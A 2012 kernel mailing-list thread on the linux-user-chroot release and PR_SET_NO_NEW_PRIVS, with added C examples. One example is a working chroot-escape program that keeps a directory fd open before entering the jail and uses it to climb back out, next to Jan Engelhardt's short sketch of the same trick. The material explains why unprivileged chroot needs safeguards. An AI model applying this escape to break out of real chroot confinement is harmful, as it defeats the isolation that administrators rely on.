Colin Walters | 10 Aug 2012 22:58

linux-user-chroot 2012.2

Hi,

This is the release of linux-user-chroot 2012.2.  The major change now
is that it makes use of Andy's new PR_SET_NO_NEW_PRIVS.  This doesn't
close any security hole I'm aware of - our previous use of the MS_NOSUID
bind mount over / should work - but, belt and suspenders as they say.

The code:
http://git.gnome.org/browse/linux-user-chroot/commit/?id=515c714471d0b5923f6633ef44a2270b23656ee9

As for how linux-user-chroot and PR_SET_NO_NEW_PRIVS relate, see this
thread:
http://thread.gmane.org/gmane.linux.kernel.lsm/15339

Summary
-------

This tool allows regular (non-root) users to call chroot(2), create
Linux bind mounts, and use some Linux container features.  It's
primarily intended for use by build systems.

Project information
-------------------

There's no web page yet; send patches to
Colin Walters <walters <at> verbum.org>
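
What PR_SET_NO_NEW_PRIVS adds on top of the MS_NOSUID bind mount is that it is a per-task property rather than a per-mount one: once set, no execve() in that task or its descendants can grant privileges (setuid/setgid bits, file capabilities), regardless of which filesystem the binary lives on, and the flag can never be cleared. The following is an added example, not code from linux-user-chroot or from this thread; it exercises the prctl directly on Linux >= 3.5 and defines the prctl numbers itself in case the libc headers predate them.

```c
/* Added example, not from linux-user-chroot: exercising
 * PR_SET_NO_NEW_PRIVS directly to see the properties it provides.
 * Linux >= 3.5; the prctl numbers are defined here in case the libc
 * headers predate them. */
#define _GNU_SOURCE
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/prctl.h>
#include <sys/wait.h>
#include <unistd.h>

#ifndef PR_SET_NO_NEW_PRIVS
#define PR_SET_NO_NEW_PRIVS 38
#endif
#ifndef PR_GET_NO_NEW_PRIVS
#define PR_GET_NO_NEW_PRIVS 39
#endif

/* Turn the flag on for the calling thread.  0 on success, -1 on error
 * (e.g. EINVAL from a kernel that predates the flag). */
int enable_no_new_privs(void)
{
    return prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0);
}

/* 1 if set, 0 if clear, -1 if the kernel does not know the flag. */
int query_no_new_privs(void)
{
    return prctl(PR_GET_NO_NEW_PRIVS, 0, 0, 0, 0);
}

/* The flag is one-way: the kernel accepts only arg2 == 1, so asking
 * for 0 fails with EINVAL.  Returns -1 on every kernel that implements
 * the flag. */
int try_clear_no_new_privs(void)
{
    return prctl(PR_SET_NO_NEW_PRIVS, 0, 0, 0, 0);
}

/* The flag is inherited across fork() and execve(): fork a child and
 * report the value it sees.  Returns the child's view, or -1 on error. */
int child_inherits_no_new_privs(void)
{
    pid_t pid = fork();
    if (pid < 0)
        return -1;
    if (pid == 0)
        _exit(query_no_new_privs() == 1 ? 1 : 0);
    int status;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status))
        return -1;
    return WEXITSTATUS(status);
}

/* The same value as reported by the NoNewPrivs line of
 * /proc/self/status (Linux >= 4.10), which is how a shell or an exec'd
 * program can check it.  Returns 0/1, or -1 if the line is absent. */
int status_file_no_new_privs(void)
{
    FILE *f = fopen("/proc/self/status", "r");
    if (!f)
        return -1;
    char line[256];
    int value = -1;
    while (fgets(line, sizeof line, f)) {
        if (strncmp(line, "NoNewPrivs:", 11) == 0) {
            value = atoi(line + 11);
            break;
        }
    }
    fclose(f);
    return value;
}

int main(void)
{
    printf("before: %d\n", query_no_new_privs());
    if (enable_no_new_privs() != 0) {
        perror("PR_SET_NO_NEW_PRIVS");
        return 1;
    }
    printf("after:  %d\n", query_no_new_privs());
    printf("clear attempt: %d (%s)\n", try_clear_no_new_privs(), strerror(errno));
    printf("child sees: %d\n", child_inherits_no_new_privs());
    printf("/proc/self/status says: %d\n", status_file_no_new_privs());
    return 0;
}
```

The interesting line is the failed clear attempt: a jailed build job cannot undo the flag, and anything it forks or execs carries it, so a setuid helper reachable through some path that is not covered by the nosuid bind mount still runs without gaining privileges.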

Andy Lutomirski | 13 Aug 2012 20:10

Re: linux-user-chroot 2012.2

On Fri, Aug 10, 2012 at 1:58 PM, Colin Walters <walters <at> verbum.org> wrote:
> Hi,
>
> This is the release of linux-user-chroot 2012.2.  The major change now
> is that it makes use of Andy's new PR_SET_NO_NEW_PRIVS.  This doesn't
> close any security hole I'm aware of - our previous use of the MS_NOSUID
> bind mount over / should work - but, belt and suspenders as they say.
>
> The code:
> http://git.gnome.org/browse/linux-user-chroot/commit/?id=515c714471d0b5923f6633ef44a2270b23656ee9
>
> As for how linux-user-chroot and PR_SET_NO_NEW_PRIVS relate, see this
> thread:
> http://thread.gmane.org/gmane.linux.kernel.lsm/15339
>
> Summary
> -------
>
> This tool allows regular (non-root) users to call chroot(2), create
> Linux bind mounts, and use some Linux container features.  It's
> primarily intended for use by build systems.

Nifty.

One of these days, I intend to resurrect my unprivileged chroot kernel
patches.  My current thought is to add a new syscall weak_chroot,
which should have these properties:

1. Can't be used unless no_new_privs is set or you have CAP_SYS_ADMIN.
2. Can't be used if fs->users > 1 (to avoid a trivial no_new_privs bypass).

Jan Engelhardt | 9 Sep 2012 23:24

Re: linux-user-chroot 2012.2


On Monday 2012-08-13 20:10, Andy Lutomirski wrote:
>
>One of these days, I intend to resurrect my unprivileged chroot kernel
>patches.  My current thought is to add a new syscall weak_chroot,
>which should have these properties:
>[...]
>3. Can't be used to break out of chroot jail.
>
>The interface might be:
>
>weak_chroot_at(int fd, const char *path, int flags)
>[...]
>I'm somewhat tempted to add a flag to weak_chroot_at to break out of
>weak_root jail to prevent people from thinking that it's a security
>feature.  I'm not sure about that, though.

An at variant of chroot would seem to be even more open than the
current name-based variant of chroot.

int fd1 = open("/", O_DIRECTORY);              /* handle on the real root, taken before any jail */
int fd2 = open("/home/whatever", O_DIRECTORY);
weak_chroot_at(fd2, ".", 0);                   /* enter the jail */
weak_chroot_at(fd1, ".", 0);                   /* and leave it again via the retained fd */
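
The escape Jan sketches needs nothing but a directory fd opened before the jail is entered, and the same trick works against the existing chroot(2) today: chroot() changes the root but not the working directory, so fchdir() to a retained fd followed by chroot(".") climbs back out. The following is an added example, not code from the thread; it runs the sequence in a forked child against a constructed empty directory under /tmp. chroot(2) itself requires CAP_SYS_CHROOT, so an unprivileged caller sees EPERM and the function reports that instead of the escape.

```c
/* Added example, not from the thread: the retained-directory-fd escape
 * against the real chroot(2).  chroot() needs CAP_SYS_CHROOT, so an
 * unprivileged caller gets EPERM and the function reports that. */
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

enum {
    ESCAPE_UNPRIVILEGED = 0, /* chroot() refused with EPERM: no CAP_SYS_CHROOT */
    ESCAPED             = 1, /* entered the jail and climbed back out */
    STILL_JAILED        = 2, /* the fd trick did not work (unexpected) */
    ESCAPE_ERROR        = 3  /* setup failure (mkdtemp, fork, ...) */
};

/* Body of the forked child; the exit status carries the result so the
 * parent's root directory is never touched. */
static int jail_child(const char *jail)
{
    /* 1. Keep a handle on the real root before entering the jail. */
    int outside = open("/", O_RDONLY | O_DIRECTORY);
    if (outside < 0)
        return ESCAPE_ERROR;

    /* 2. Enter the (empty) jail. */
    if (chroot(jail) != 0)
        return errno == EPERM ? ESCAPE_UNPRIVILEGED : ESCAPE_ERROR;
    if (chdir("/") != 0)
        return ESCAPE_ERROR;
    /* Inside the jail its own path must no longer be visible. */
    if (access(jail, F_OK) == 0)
        return ESCAPE_ERROR;

    /* 3. The escape: cwd := the outside fd, then make cwd the new root. */
    if (fchdir(outside) != 0 || chroot(".") != 0 || chdir("/") != 0)
        return STILL_JAILED;

    /* 4. We are outside again if the jail directory is visible from "/". */
    return access(jail, F_OK) == 0 ? ESCAPED : STILL_JAILED;
}

int fd_escape_demo(void)
{
    char jail[] = "/tmp/jail.XXXXXX";   /* constructed scratch directory */
    if (mkdtemp(jail) == NULL)
        return ESCAPE_ERROR;

    pid_t pid = fork();
    if (pid < 0) {
        rmdir(jail);
        return ESCAPE_ERROR;
    }
    if (pid == 0)
        _exit(jail_child(jail));

    int status;
    if (waitpid(pid, &status, 0) < 0 || !WIFEXITED(status)) {
        rmdir(jail);
        return ESCAPE_ERROR;
    }
    rmdir(jail);
    return WEXITSTATUS(status);
}

int main(void)
{
    static const char *names[] = {
        "unprivileged (chroot refused, no CAP_SYS_CHROOT)",
        "escaped via retained fd",
        "still jailed",
        "error",
    };
    int r = fd_escape_demo();
    printf("%s\n", names[r]);
    return 0;
}
```

Run as root (or with CAP_SYS_CHROOT) the child reports that it escaped; run as an ordinary user it reports that chroot() was refused. The point for an unprivileged or fd-based chroot is that the capability check is the only thing standing between "can enter a jail" and "can leave it", which is why a weak_chroot would need extra conditions rather than just dropping the check.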

